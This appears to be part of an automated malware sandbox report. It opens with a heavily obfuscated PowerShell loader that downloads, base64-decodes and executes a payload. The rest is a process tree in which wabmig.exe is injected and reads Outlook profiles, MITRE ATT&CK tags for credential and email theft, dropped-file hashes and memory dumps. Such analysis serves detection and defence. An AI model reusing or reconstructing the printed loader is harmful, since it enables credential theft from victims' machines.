edslyJannilTongua,tilkcCounttRump.o Drivl f,lmaB,sbaeKitnimTelefa PaahtOff.raPresu) Rang ');Natteredness (Blottelses 'Sabes[Ung lNinduseMut,atdisin.gravsSFluepe BionrSammevOlieriDavidcE skueSys eP ThraoAntn iPastonBe.tatSa atMEnve aBlodtnU radaF,ittgA sereGa lirPreut] Neme:T,ito:Ri htSmask.eB.llicMor,ruIrredrEnthuiMorpht Ska,y V,llPEn.alrFormuoBremstUddanoEla tc Hvidor,vollSa va Ure e=Cimbr Leetl[StoriNFlince ProttArgyr.,ointSKapiteVrdilcCattiu eslrefteriExtratP ramy FlynP T rorDri toRemagtAfskeoa,kercSwa moAtomilUnmatTKsnehy iberpIte ie Pa r] Mano:Heter: NettT StuelEnamesTamia1Algom2val t ');$diakoners=$Skolekammeraten[0];$lyknskningstelegrammer= (Blottelses ' Br e$Bion.GStangL Ta tOfootsbvalglA urtoL Delt: ubepoptaloXanthL ntopYV rgiC,venuhSa veaEntomSBlowsi andruAnti m Path=GenevN MassENewfawNonfe-DoseroEigi b ChevJ SlumEYou hCDomflt ehnd RetrosIndfayLykkes JehuT laine Kalkm Kale.SbladNUds aeBenovtGub,t.SniglwconvoeUns,cbNi olCEpisoLNat oi ontre ofllnAfskdt');$lyknskningstelegrammer+=$Masseskrivelser[1];Natteredness ($lyknskningstelegrammer);Natteredness (Blottelses ' I fe$ObserPF ageoEcheflGrapnyHypokc ,jahh Astra FrarsVigeliarranuForham ,umm. UncaH.adeaeSe.tvaKontod Kemie LancrKara sLnmod[ Fak $ TritAGentobSkemaa.ishptAttrai NonicFyrin9Carle5 rimm] Re.s=Bombe$SvigeS Agteu .arkc E olk Krypl Trise SplirSa insSp ns7Po ic7 Mese ');$plimsoller=Blottelses 'Spher$BokarPUdb.soAcc ll cr,mySkoancS perhStinkaPrec sCockai samfuKa.ermTappe.KildeDSterloShapewBaldfnfesttlO seroBeskyaRa,gfd Sm eFCora.iIndkllreforeRrled( Ante$cnemidLeptoiAcce.aS mmekAzygooIrrecnUr.taePhonor EnersSubje,Margu$SkorppUlyd a Ofrer stoftMerkahSeroteLnud.nYderlo leptpNonreh ProgoGalmaboverriPaxilaKnack) Hell ';$parthenophobia=$Masseskrivelser[0];Natteredness (Blottelses 'Indv.$ SpagG Fo eltapetO KatoBligkiAMornelAemil:GipsihP,thaJ ColekChromuMennel Hj rTDar iuSandvRJubilEpigeonUnb g= Stil( UnveTOnt,geInters SyleT Dyks-EndosPsk bsATikroTArveah hgne S.per$OblonPPeeliaU steRAfvastS,looHCanceESeparnHows.o,yrepPrefenH S rgOQuartB pwaiNedruaregns) weis ');while (!$Hjkulturen) {Natteredness (Blottelses 'Unob $Me,acgThewil RefloPersibJayceaHyldel,nadv:U estPDaguerS denoA,phaeHorselCortiePas,icRentetRdn trMu feiRex lcUdmat=Havel$S.lestHundrrKnudeuFrat eMe.ta ') ;Natteredness $plimsoller;Natteredness (Blottelses 'Meri.SvegettSonaraBanesr Aflot,lloi-StyreS Purilp efoe Nedee ceripWitne Forsi4Genet ');Natteredness (Blottelses ' drgt$ DomngNuttelLauruoSkrutb Sem aPaatrl,fsyr: E,olHU,isojRekonkPrvepufaderlGenvotDideruMicrorReforeSqu wn Bens= bloo(GasliTAnpare FlimsAll etpast - F sfPOpfejaJor etGob ehSynba Puca$ UppipStjebaB.nders,tist ensuhOutsteFab.in SvenoSpitzp Cr,zhs lopoTematbU draiHearkaPlai,) eme ') ;Natteredness (Blottelses ' Nong$Civi gSalpilModtrocursob Kn raEpidilPilta: Cad.N YppedHo.oreTehu nIonisd HaemeObliv=San.t$ TermgSammelPassio FodrbA pelaThaipl U,vl: Sam S AgartFil ctSwagseProbosvolenkKerrtiDiadipI klupDramae,eanirquodlsTonsu+Ag,ew+ Jobu%Jelin$S ksaSOpvarkCorymoElgenl genoeCun ckMadonaBo dsm Tmmem BerleEnamorOpproaBirk.t Kar eGrundn,alor.Dynamc paano SrnuuTadesn ArretMashm ') ;$diakoners=$Skolekammeraten[$Ndende];}$Redintegrator=332465;$Executionist=29545;Natteredness (Blottelses 'S,red$ Decrg PolilForvioDen ib.veraaImplal Sanj: ShagWTalisaPolymlMiddlk fsgnyUninfrtwelfi chreVid o Conif=Tr pi Wai,eG itcheU.strtE,fen-Ar leCEndoto.aabenRumsktSu daeSilicnIhukot adop Money$Opbevp rispaJernbr eliet,drenh nrege ElevnK,opso.msvipFo dohBl ncoKutteb,oliviBakesaMetal ');Natteredness (Blottelses 'Luksu$Multig RegilBracho erhab ForuaScfinlfrag :Gilb G ndee TaksnCognaaRa stnBeylisPer,okdeka aCatelfBalisf dupze Amerds inneBedre Henst=Torsd Typhi[Lumb SLinguyXenops ovemtObispeSmrehm Skrp.TolksCDaa eoEven nBuskavscrupe tillr SyndtTaxim] Ki,l:r jec:formiFKnyt,rCochloBeredm olitBTroosaSjlefsHori eLejeb6lix v4SweepSAnsvat Et irShouciJu epnAnstagFibr (Ste.k$Fr taW PicraGuysalC conkLimity,narkrFry eiFugtteInter)Ob ek ');Natteredness (Blottelses 'Popeh$SmuldgNearll Hemao UrbabJulesa NsevlCheck:KonsimRecory Tro,cDissio SubmpmisclludhveaOrismn SndaaShend Overw= bard Navne[Bil eSUdebly UdsksTy ektMagneeKlovnmSporv.Bie,nT ThioeSpadoxDuttetMa.er. PrefEEvasinCh recBuf,eo LrkedS,ecii itidnUnp,ygSynk ]Unsis:Sej h:P.nctASkotjS OdonCKildeI mugIAboli.AcidiGGlosseArtistSmel SAdstrtConcir ArbeiKonsinHousegMenus(Bedcl$ focaG U oxe U aen Ganea o,ernFiddlsStbankKoketaAeriefCrustfS teleEuro dHybrieChiro)C nni ');Natteredness (Blottelses ',eyss$ ittegC,rtolfe nsoMiddebEx,raa TogflKrydd:KonklgNeg,ruTutstlBygged Frims Subrt BreloStenolVi.iee tillsUnt i=Therm$Bewenm totoyphonocdistioTranspSquamlL.ngfaPolydn ylskaRep s.SubpasU extuGraasbDeglusDepont DosmrAnd.liProhinnon,rgTin,s(Grumo$AdsplR orsoeBeflod Non iId.alnLissyt Da leCallugTrachrFatbaaeftertJalouoSeks.rVene ,Synce$Sold E Ancix SynteSemibchai buSlibrt HensiGatoroHe,winadoptiArransKunsttC lte)Stylt ');Natteredness $guldstoles;"
      4⤵
      Network Service Discovery
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2672
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jordbesiddelsens.Mat && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2516
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:2456
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

Network Service Discovery

1

T1046

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Jordbesiddelsens.Mat

Filesize
471KB

MD5
cf7331480f95d39715e454c907d226f2

SHA1
af15dda30ce342a3fdacc8af630869452796044a

SHA256
1a6b2af6898b046773439eb085ae5584e2c1d505b96eab0ce7dca70d0602fde3

SHA512
b04710ccb65aa9106b359263e0d722e818a8c3ef87c610a79b64de4e2059b47b7dd398ecd7b42d6a5ab29d222f0b1626ce2de3ce1782ef21e70cdd08cf3759f2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\STJGM8E18ADEKK59DTYX.temp

Filesize
7KB

MD5
94f3468a324753952aad4e2c34bdf42f

SHA1
7f46995821f9a179457ad45235b2129c17b7ae5c

SHA256
a328f9bb5c63b17aa1d5354a8a75ec6a892233a6d8f7538ec14dfc70fedce76f

SHA512
01025538e8bb42e90be6a5d46f627c64055ca694d0626537c95ef24ec6a76c0276356f43af09a9e7dd29379f1fbfaa39a349fac7c035c3599b6309cec8f0a6f0

Download Submit
memory/2672-18-0x00000000067A0000-0x000000000B647000-memory.dmp

Filesize
78.7MB

Download
memory/2880-13-0x000007FEF553E000-0x000007FEF553F000-memory.dmp

Filesize
4KB

Download
memory/2880-10-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-12-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-4-0x000007FEF553E000-0x000007FEF553F000-memory.dmp

Filesize
4KB

Download
memory/2880-9-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-8-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-7-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-44-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-6-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/2880-5-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2984-19-0x0000000000770000-0x0000000005617000-memory.dmp

Filesize
78.7MB

Download
memory/2984-42-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2984-43-0x0000000000770000-0x0000000005617000-memory.dmp

Filesize
78.7MB

Download

Analysis

Sharing